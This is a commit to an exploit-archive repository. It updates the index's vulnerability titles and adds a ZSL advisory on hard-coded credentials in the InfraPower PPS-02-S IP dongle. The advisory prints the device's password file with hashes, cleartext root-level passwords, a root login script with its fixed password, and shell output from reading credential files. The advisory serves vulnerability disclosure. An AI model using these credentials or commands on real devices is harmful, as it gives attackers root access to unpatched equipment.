DB: 2016-10-29

7 new exploits

SetCMS 3.6.5 - (setcms.org) Remote Command Execution
SetCMS 3.6.5 - Remote Command Execution
PHP-Nuke < 8.0 - 'sid' SQL Injection
PHP-Nuke 8.0 Final - 'sid' SQL Injection
PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection
PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection

Foojan Wms 1.0 - (index.php story) SQL Injection
Foojan Wms 1.0 - 'story' Parameter SQL Injection

Web Wiz Forums 9.07 - (sub) Directory Traversal
Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal
Web Wiz NewsPad 1.02 - (sub) Directory Traversal
Siteman 1.1.9 - (cat) Remote File Disclosure
Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution
SLAED CMS 2.5 Lite - (newlang) Local File Inclusion
Liquid-Silver CMS 0.1 - (update) Local File Inclusion
Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal
Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure
Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution
SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion
Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion
Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure
ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)
Seagull 0.6.3 - 'files' Parameter Remote File Disclosure
ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)

flinx 1.3 - (category.php id) SQL Injection
flinx 1.3 - 'id' Parameter SQL Injection

Persits XUpload 3.0 - AddFile() Remote Buffer Overflow
Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow

simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection
WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection
Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)
Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)
WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection
WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection
Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)
Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)
phpMyClub 0.0.1 - (page_courante) Local File Inclusion
bubbling library 1.32 - dispatcher.php Remote File Disclosure
Bigware Shop 2.0 - pollid SQL Injection
Smart Publisher 1.0.1 - (disp.php) Remote Code Execution
SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit
phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion
bubbling library 1.32 - 'uri' Parameter Remote File Disclosure
Bigware Shop 2.0 - 'pollid' Parameter SQL Injection
Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution
SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit
phpCMS 1.2.2 - (parser.php) Remote File Disclosure
Mambo Component NewsLetter - (listid) SQL Injection
Mambo Component Fq - (listid) SQL Injection
Mambo Component MaMML - (listid) SQL Injection
phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure
Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection
Mambo 'com_fq' - 'listid' Parameter SQL Injection
Mambo 'com_mamml' - 'listid' Parameter SQL Injection
phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - 'counter.php' Remote File Inclusion
phpCMS 1.1.7 - 'parser.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion

phpCMS 2008 - 'ask/search_ajax.php' SQL Injection
phpCMS 2008 - 'search_ajax.php' SQL Injection
InfraPower PPS-02-S Q213V1 - Local File Disclosure
InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference
InfraPower PPS-02-S Q213V1 - Authentication Bypass
InfraPower PPS-02-S Q213V1 - Multiple XSS
InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery
InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials
InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution
This commit is contained in:
Offensive Security 2016-10-29 05:01:21 +00:00
parent d97b4f7c48
commit 3b565e4e9d
8 changed files with 1462 additions and 39 deletions

View file

@ -4610,53 +4610,53 @@ id,file,description,date,author,platform,type,port
4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0
4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0
4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0
4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0
4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0
4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote,0
4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0
4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0
4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0
4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0
4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0
4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0
4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0
4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0
4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0
4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0
4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0
4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0
4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0
4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0
5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0
5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0
5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0
5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
@ -26419,16 +26419,16 @@ id,file,description,date,author,platform,type,port
29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0
29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0
29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0
@ -29720,7 +29720,7 @@ id,file,description,date,author,platform,type,port
32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0
32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0
32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0
32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
@ -36728,6 +36728,13 @@ id,file,description,date,author,platform,type,port
40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0
40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0
40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple XSS",2016-10-28,LiquidWorm,php,webapps,0
40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0
40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0

Can't render this file because it is too large.

View file

@ -0,0 +1,195 @@
InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a use of hard-coded credentials. The IP
dongle firmware ships with hard-coded accounts that can be used to gain
full system access (root) using the telnet daemon on port 23.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5371
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
27.09.2016
--
# cat /etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
# showing accounts in root group:
Username: root
Password: 8475
--
Username: service
Password: ipdongle
--
Username: www
Password: 9311
--
Username: www2
Password: 9311
# showing other less-privileged accounts:
Username: user
Password: 8475
--
Username: admin
Password: 8475
--------
/mnt/mtd # echo $SHELL
/sbin/root_shell.sh
/mnt/mtd # cat /sbin/root_shell.sh
#!/bin/sh
trap "" 2 3 9 24
# check login
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
if [ "$passWork" = "1" ]; then
login_file=/mnt/mtd/root_login
now_timestamp=`date +%s`
if [ -f $login_file ]; then
line=`wc -l $login_file | cut -c 1-9`
if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
pre_result1=`echo $pre_login | cut -d " " -f 1`
pre_result2=`echo $pre_login | cut -d " " -f 2`
pre_result3=`echo $pre_login | cut -d " " -f 3`
if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
if [ "$result" != "success" ]; then
echo $result
exit 0
fi
fi
fi
fi
echo -n "password:"
read pass
if [ "$pass" != "999" ]; then
echo "wrong password"
echo fail $now_timestamp >> $login_file
exit 0
fi
echo success $now_timestamp >> $login_file
fi
/bin/sh
/mnt/mtd #
--------
/mnt/mtd # ls
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
--------
/mnt/mtd # df -h
Filesystem Size Used Available Use% Mounted on
tmpfs 256.0M 4.0K 256.0M 0% /tmp
